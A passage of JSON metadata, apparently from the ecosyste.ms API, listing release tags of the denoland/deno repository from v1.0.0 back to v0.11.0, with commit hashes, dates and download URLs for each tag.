ories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-0